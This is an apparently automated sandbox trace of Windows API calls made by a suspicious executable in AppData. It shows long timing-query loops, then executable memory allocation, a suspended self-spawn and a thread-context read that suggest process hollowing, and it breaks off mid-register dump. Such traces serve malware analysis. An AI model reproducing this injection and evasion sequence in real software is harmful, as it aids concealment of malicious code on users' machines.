lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.884] GetLastError () returned 0x0 [0202.884] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.884] GetLastError () returned 0x0 [0202.884] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.884] GetLastError () returned 0x0 [0202.884] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.884] GetLastError () returned 0x0 [0202.884] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.884] GetLastError () returned 0x0 [0202.884] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.884] GetLastError () returned 0x0 [0202.884] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.885] GetLastError () returned 0x0 [0202.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.885] GetLastError () returned 0x0 [0202.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.885] GetLastError () returned 0x0 [0202.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.885] GetLastError () returned 0x0 [0202.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.885] GetLastError () returned 0x0 [0202.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.885] GetLastError () returned 0x0 [0202.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.885] GetLastError () returned 0x0 [0202.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.885] GetLastError () returned 0x0 [0202.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.885] GetLastError () returned 0x0 [0202.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.885] GetLastError () returned 0x0 [0202.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.885] GetLastError () returned 0x0 [0202.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.885] GetLastError () returned 0x0 [0202.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.885] GetLastError () returned 0x0 [0202.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.885] GetLastError () returned 0x0 [0202.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.885] GetLastError () returned 0x0 [0202.886] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.886] GetLastError () returned 0x0 [0202.886] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.886] GetLastError () returned 0x0 [0202.886] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.886] GetLastError () returned 0x0 [0202.886] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.886] GetLastError () returned 0x0 [0202.886] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.886] GetLastError () returned 0x0 [0202.886] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.886] GetLastError () returned 0x0 [0202.886] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.886] GetLastError () returned 0x0 [0202.886] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.886] GetLastError () returned 0x0 [0202.886] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.886] GetLastError () returned 0x0 [0202.886] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.886] GetLastError () returned 0x0 [0202.886] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.886] GetLastError () returned 0x0 [0202.886] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.886] GetLastError () returned 0x0 [0202.886] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.886] GetLastError () returned 0x0 [0202.886] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.886] GetLastError () returned 0x0 [0202.886] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.887] GetLastError () returned 0x0 [0202.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.887] GetLastError () returned 0x0 [0202.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.887] GetLastError () returned 0x0 [0202.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.887] GetLastError () returned 0x0 [0202.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.887] GetLastError () returned 0x0 [0202.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.887] GetLastError () returned 0x0 [0202.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.887] GetLastError () returned 0x0 [0202.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.887] GetLastError () returned 0x0 [0202.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.887] GetLastError () returned 0x0 [0202.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.887] GetLastError () returned 0x0 [0202.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.887] GetLastError () returned 0x0 [0202.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.887] GetLastError () returned 0x0 [0202.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190a8230, dwHighDateTime=0x1d4be3b)) [0202.887] GetLastError () returned 0x0 [0202.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.887] GetLastError () returned 0x0 [0202.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.888] GetLastError () returned 0x0 [0202.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.888] GetLastError () returned 0x0 [0202.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.888] GetLastError () returned 0x0 [0202.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.888] GetLastError () returned 0x0 [0202.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.888] GetLastError () returned 0x0 [0202.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.888] GetLastError () returned 0x0 [0202.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.888] GetLastError () returned 0x0 [0202.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.888] GetLastError () returned 0x0 [0202.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.888] GetLastError () returned 0x0 [0202.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.888] GetLastError () returned 0x0 [0202.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.888] GetLastError () returned 0x0 [0202.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.888] GetLastError () returned 0x0 [0202.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.888] GetLastError () returned 0x0 [0202.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.888] GetLastError () returned 0x0 [0202.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.888] GetLastError () returned 0x0 [0202.889] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.889] GetLastError () returned 0x0 [0202.889] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.889] GetLastError () returned 0x0 [0202.889] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.889] GetLastError () returned 0x0 [0202.889] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.889] GetLastError () returned 0x0 [0202.889] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.889] GetLastError () returned 0x0 [0202.889] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.889] GetLastError () returned 0x0 [0202.889] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.889] GetLastError () returned 0x0 [0202.889] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.889] GetLastError () returned 0x0 [0202.889] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.889] GetLastError () returned 0x0 [0202.889] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.889] GetLastError () returned 0x0 [0202.889] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.889] GetLastError () returned 0x0 [0202.889] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.889] GetLastError () returned 0x0 [0202.889] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.889] GetLastError () returned 0x0 [0202.889] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbd0 | out: lpSystemTimeAsFileTime=0x18fbd0*(dwLowDateTime=0x190ce390, dwHighDateTime=0x1d4be3b)) [0202.889] GetLastError () returned 0x0 [0219.850] SetProcessDEPPolicy (dwFlags=0x2) returned 0 [0219.851] GetProcAddress (hModule=0x76540000, lpProcName="VirtualAlloc") returned 0x76551856 [0219.851] VirtualAlloc (lpAddress=0x0, dwSize=0x3ba, flAllocationType=0x1000, flProtect=0x40) returned 0x2b0000 [0219.851] GetProcAddress (hModule=0x76540000, lpProcName="VirtualAlloc") returned 0x76551856 [0219.851] VirtualAlloc (lpAddress=0x0, dwSize=0x4470a, flAllocationType=0x1000, flProtect=0x40) returned 0x2c0000 [0219.856] GetProcAddress (hModule=0x76540000, lpProcName="VirtualAlloc") returned 0x76551856 [0219.856] GetProcAddress (hModule=0x76540000, lpProcName="ExitProcess") returned 0x76557a10 [0219.856] VirtualAlloc (lpAddress=0x0, dwSize=0x28e00, flAllocationType=0x1000, flProtect=0x40) returned 0x310000 [0219.859] VirtualAlloc (lpAddress=0x0, dwSize=0x1be0, flAllocationType=0x3000, flProtect=0x40) returned 0x340000 [0219.861] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x180e6c, nSize=0x103 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\fumezad.exe")) returned 0x36 [0219.861] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0219.861] CreateProcessW (in: lpApplicationName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe", lpCommandLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x180e14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x181104 | out: lpCommandLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", lpProcessInformation=0x181104*(hProcess=0x58, hThread=0x54, dwProcessId=0x354, dwThreadId=0x630)) returned 1 [0219.865] GetThreadContext (in: hThread=0x54, lpContext=0x180b24 | out: lpContext=0x180b24*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x40bb34, Ebp=0x0, Eip=0x777d01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, 